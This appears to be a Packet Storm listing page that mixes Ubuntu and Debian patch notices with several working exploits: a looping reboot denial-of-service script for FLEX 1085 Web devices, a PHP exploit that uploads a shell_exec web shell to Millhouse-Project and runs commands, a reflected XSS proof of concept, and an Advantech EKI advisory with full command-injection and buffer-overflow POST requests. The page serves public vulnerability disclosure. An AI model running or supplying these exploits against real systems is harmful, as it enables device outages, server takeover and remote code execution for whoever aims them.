FLEX versions prior to 1085 Web 1.6.0 suffer from a denial of service vulnerability.

    # Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service# Date: 2023-05-06# Exploit Author: Mr Empy# Vendor Homepage: https://www.tem.ind.br/# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94# Version: 1.6.0# Tested on: Android# CVE ID: CVE-2022-2591#!/usr/bin/env python3import requestsimport reimport argparsefrom colorama import Foreimport timedef main():    def banner():        print('''            ________    _______  __           / ____/ /   / ____/ |/ /          / /_  / /   / __/  |   /         / __/ / /___/ /___ /   |        /_/   /_____/_____//_/|_|[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]''')    def reboot():        r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')        if 'Rebooting' in r.text:            pass        else:            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardwarenão é vulnerável')            quit()    banner()    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')    while True:        try:            reboot()            print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardwarederrubado com sucesso!')            time.sleep(1)        except:#            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardwareestá inativo')            passif __name__ == '__main__':    parser = argparse.ArgumentParser()    parser.add_argument('-t','--target', action='store', help='Target',dest='target', required=True)    arguments = parser.parse_args()    try:        main()    except KeyError:        quit()

FLEX Denial Of Service

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

Samhain File Integrity Checker 4.4.10

Ubuntu Security Notice 6073-3 - Jan Wasilewski and Gorka Eguileor discovered that Nova incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-3  
May 11, 2023

nova vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Nova could be made to expose sensitive information.

Software Description:  
- nova: OpenStack Compute cloud infrastructure

Details:

Jan Wasilewski and Gorka Eguileor discovered that Nova incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-nova                    3:27.0.0-0ubuntu1.1

Ubuntu 22.10:  
   python3-nova                    3:26.1.0-0ubuntu2.1

Ubuntu 22.04 LTS:  
   python3-nova                    3:25.1.0-0ubuntu2.1

Ubuntu 20.04 LTS:  
   python3-nova                    2:21.2.4-0ubuntu2.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-3  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/nova/3:27.0.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/nova/3:26.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/nova/3:25.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.3

Ubuntu Security Notice USN-6073-3

Ubuntu Security Notice 6073-1 - Jan Wasilewski and Gorka Eguileor discovered that Cinder incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-1  
May 11, 2023

cinder vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Cinder could be made to expose sensitive information.

Software Description:  
- cinder: OpenStack storage service

Details:

Jan Wasilewski and Gorka Eguileor discovered that Cinder incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-cinder                  2:22.0.0-0ubuntu1.1

Ubuntu 22.10:  
   python3-cinder                  2:21.1.0-0ubuntu2.1

Ubuntu 22.04 LTS:  
   python3-cinder                  2:20.1.0-0ubuntu2.1

Ubuntu 20.04 LTS:  
   python3-cinder                  2:16.4.2-0ubuntu2.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/cinder/2:22.0.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/cinder/2:21.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/cinder/2:20.1.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/cinder/2:16.4.2-0ubuntu2.3

Ubuntu Security Notice USN-6073-1

Ubuntu Security Notice 6073-4 - Jan Wasilewski and Gorka Eguileor discovered that os-brick incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-4  
May 11, 2023

python-os-brick vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

os-brick could be made to expose sensitive information.

Software Description:  
- python-os-brick: Library for managing local volume attaches

Details:

Jan Wasilewski and Gorka Eguileor discovered that os-brick incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-os-brick                6.2.0-0ubuntu2.1

Ubuntu 22.10:  
   python3-os-brick                6.1.0-0ubuntu1.1

Ubuntu 22.04 LTS:  
   python3-os-brick                5.2.2-0ubuntu1

Ubuntu 20.04 LTS:  
   python3-os-brick                3.0.8-0ubuntu1.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-4  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/python-os-brick/6.2.0-0ubuntu2.1  
   https://launchpad.net/ubuntu/+source/python-os-brick/6.1.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-os-brick/5.2.2-0ubuntu1  
   https://launchpad.net/ubuntu/+source/python-os-brick/3.0.8-0ubuntu1.1

Ubuntu Security Notice USN-6073-4

Ubuntu Security Notice 6073-2 - Jan Wasilewski and Gorka Eguileor discovered that Glance_store incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6073-2  
May 11, 2023

python-glance-store vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Glance_store could be made to expose sensitive information.

Software Description:  
- python-glance-store: OpenStack Image Service store library

Details:

Jan Wasilewski and Gorka Eguileor discovered that Glance_store incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes to be completely effective,  
please see the upstream advisory for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-glance-store            4.3.0-0ubuntu1.1

Ubuntu 22.10:  
   python3-glance-store            4.1.0-0ubuntu1.1

Ubuntu 22.04 LTS:  
   python3-glance-store            3.0.0-0ubuntu1.1

Ubuntu 20.04 LTS:  
   python3-glance-store            2.0.0-0ubuntu4.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6073-2  
   https://ubuntu.com/security/notices/USN-6073-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/python-glance-store/4.3.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/4.1.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/3.0.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/2.0.0-0ubuntu4.1

Ubuntu Security Notice USN-6073-2

Debian Linux Security Advisory 5401-1 - Two security issues were found in PostgreSQL, which may result in privilege escalation or incorrect policy enforcement.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5401-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 11, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-13CVE ID         : CVE-2023-2454 CVE-2023-2455Two security issues were found in PostgreSQL, which may result inprivilege escalation or incorrect policy enforcement.For the stable distribution (bullseye), these problems have been fixed inversion 13.11-0+deb11u1.We recommend that you upgrade your postgresql-13 packages.For the detailed security status of postgresql-13 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-13Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRdF+kACgkQEMKTtsN8TjZnMA/+OW6jZvbc8StDbvz+I23baEoZizDuXYQ+LxMTBlXQMU52AsZqOOVNHWkcwWG2DtZRNWVPUftfJORenpjDMviqR+/yBJLlOu4jH68V8EFtv1I9jk70AmOGccL4mYSr66iawcIpzQFo5mv/BcMREI5raSNT/tFDtIBRfQlEYMwLfnBfprN/DGzn5x/p4Wn/7AH7a0Gu2S69YaEpgMo4eJ3g9wEsG8wgDNUieNXT67BH2qRt0h/9My2bsNVv/b0XkX+0wlDEOAd9TJSTcSqOXIlJ/8UV9DPlZE202RzrFrrcYuIyJUxdKyBDHnOTW/uWkNBTjUcE72RsSmN8XtygUA/YJIk8jtbTLSysyoSb0ONNbKo74HCwKOLTzyoR84SEd5IknZRWfmszL0wZj8qy3YWrPes2mqfFQYWXGPrjPFJmkksWU0fmuLD8rt7L02XSPoWbM47FNA+12lKqFEb39woCxo/D46G2QX0c6gIm9oeyYg1WUApmVBqRkDsps/Fv1kBeyTzq7MGUEWjpNiJaHSna3j893kr7cfnTcBe5OgKe/7yijVIf7bSoGmcvLvlb6zqQ7K5V/Mv8he9k6eInvpiIzEDTCL+BI3tXde3BO/TMTFgpgSXOAizIB+PXVz6TzW07blMzNxhKl6YqVpWt7tMtRefLdzg4CMA3QMrvzv8zPXU=D+6d-----END PGP SIGNATURE-----

Debian Security Advisory 5401-1

Advantech EKI-1524-CE series, EKI-1522 series, and EKI-1521 series suffer from command injection and buffer overflow vulnerabilities.

CyberDanube Security Research 20230511-0  
-------------------------------------------------------------------------------  
                title| Multiple Vulnerabilities  
              product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series  
   vulnerable version| 1.21  
        fixed version| 1.24  
           CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575  
               impact| High  
             homepage| https://advantech.com  
                found| 2023-03-06  
                   by| S. Dietz, T. Weber (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Advantech’s corporate vision is to enable an intelligent planet. The company  
is a global leader in the fields of IoT intelligent systems and embedded  
platforms. To embrace the trends of IoT, big data, and artificial intelligence,  
Advantech promotes IoT hardware and software solutions with the Edge  
Intelligence WISE-PaaS core to assist business partners and clients in  
connecting their industrial chains. Advantech is also working with business  
partners to co-create business ecosystems that accelerate the goal of  
industrial intelligence."

Source: https://www.advantech.com/en/about

Vulnerable versions  
-------------------------------------------------------------------------------  
EKI-1524-CE series / 1.21  
EKI-1522-CE series / 1.21  
EKI-1521-CE series / 1.21

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)  
The web server of the device is prone to two authenticated command injections.  
These allow an attacker to gain full access to the underlying operating system  
of the device. This device class can be attached to legacy systems via RS-232,  
RS-422 or RS-485. Such peripheral systems can be affected by attacks to the  
device from malicious actors.

2) Buffer Overflow (CVE-2023-2575)  
The web server is prone to a buffer overflow, triggered due to missing input  
lenght validation in the NTP input field. According to the vendor, the NTP  
server string is expected to be 64 bytes long, which is not correctly checked.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Authenticated Command Injection  
The web server is prone to two authenticated command injections via POST  
parameters. The following proof-of-concepts show how to inject commands to the  
system which gets executed with root permissions in the background:

1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)  
The following POST request executes the command “;ping 10.0.0.1” on the system:  
===============================================================================  
POST /cgi-bin/index.cgi?func=setsys HTTP/1.1  
Host: 172.16.0.100  
Accept: */*  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 541  
Origin: http://172.16.0.100  
Connection: close  
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

===============================================================================  
It is also possible to execute this command without any interceptor proxy by  
enclose it with ";", which results in the string “;ping 10.0.0.1;”.

1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)  
The device name can also be abused for command injection. It is only executed  
on reboot, but this can also be done via the device’s web-interface. A POST  
request which injects the command “;ls /etc;” can be looks like the following:  
===============================================================================  
POST /cgi-bin/index.cgi?func=setsys HTTP/1.1  
Host: 172.16.0.100  
Accept: */*  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 541  
Origin: http://172.16.0.100  
Connection: close  
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

===============================================================================  
Such command can also be injected by setting the device name to “;ls /etc;”.

2) Buffer Overflow (CVE-2023-2575)  
The following POST request can be used to trigger a buffer overflow  
vulnerability in the web server:  
===============================================================================  
POST /cgi-bin/index.cgi?func=setsys HTTP/1.1  
Host: 172.16.0.97  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: */*  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 823  
Origin: http://172.16.0.97  
Connection: close  
Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80  
===============================================================================

The serial port of the device provides error messages, which already indicate  
that the stack has been corrupted:  
/ # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 ***  
*** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 ***

Furthermore, the forked child processes seem to remain in the process list as  
zombies - three buffer overflows were triggered in this case:  
/ # ps  
PID   USER     COMMAND  
[...]  
  935 root     ./index.cgi func=setsys  
  959 root     ./index.cgi func=setsys  
  983 root     ./index.cgi func=setsys  
[...]

The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution  
-------------------------------------------------------------------------------  
Update the product to the latest available firmware version.

Workaround  
-------------------------------------------------------------------------------  
None

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends Advantech customers to upgrade the firmware to the  
latest version available.

Contact Timeline  
-------------------------------------------------------------------------------  
2023-03-08: Contacting Advantech via Service Request form; No answer.  
2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz);  
            Vendor confirmed vulnerabilities and will provide a fixed firmware  
            until 2023-05-13. Asked vendor for affected models; Vendo  
            responded that EKI-1524/1522/1521 series are affected.  
2023-03-20: Asked for status update.  
2023-03-21: Vendor responded that the firmware is currently under testing.  
2023-03-31: Vendor statet, that firmware is done and sent it via email; Found  
            additional issues and responded to vendor.  
2023-04-01: Vendor asked multiple question.  
2023-04-02: Responded to vendor, answered questions and asked for a call;  
            Vendor agreed.  
2023-04-04: Set date for a call to 2023-04-10.  
2023-04-10: Clarified further issues.  
2023-04-23: Vendor sent notification that a beta release of the firmware is  
            available.  
2023-05-02: Vendor sent notification that a new firmware release is online.  
2023-05-04: Asked vendor if the advisory can be published earlier than agreed.  
2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities  
            have been fixed.  
2023-05-11: Coordinated release of security advisory.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF S. Dietz, T. Weber / @2023

Advantech EKI-15XX Series Command Injection / Buffer Overflow

Millhouse-Project version 1.414 suffers from a cross site scripting vulnerability.

Change Mirror Download

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - register - Reflected xssDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/?>POC:http://target/views/register.php?error=%3Cscript%3Ealert(%27rose1337%27)%3C/script%3E

Millhouse-Project 1.414 Cross Site Scripting

Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

Source

Packet Storm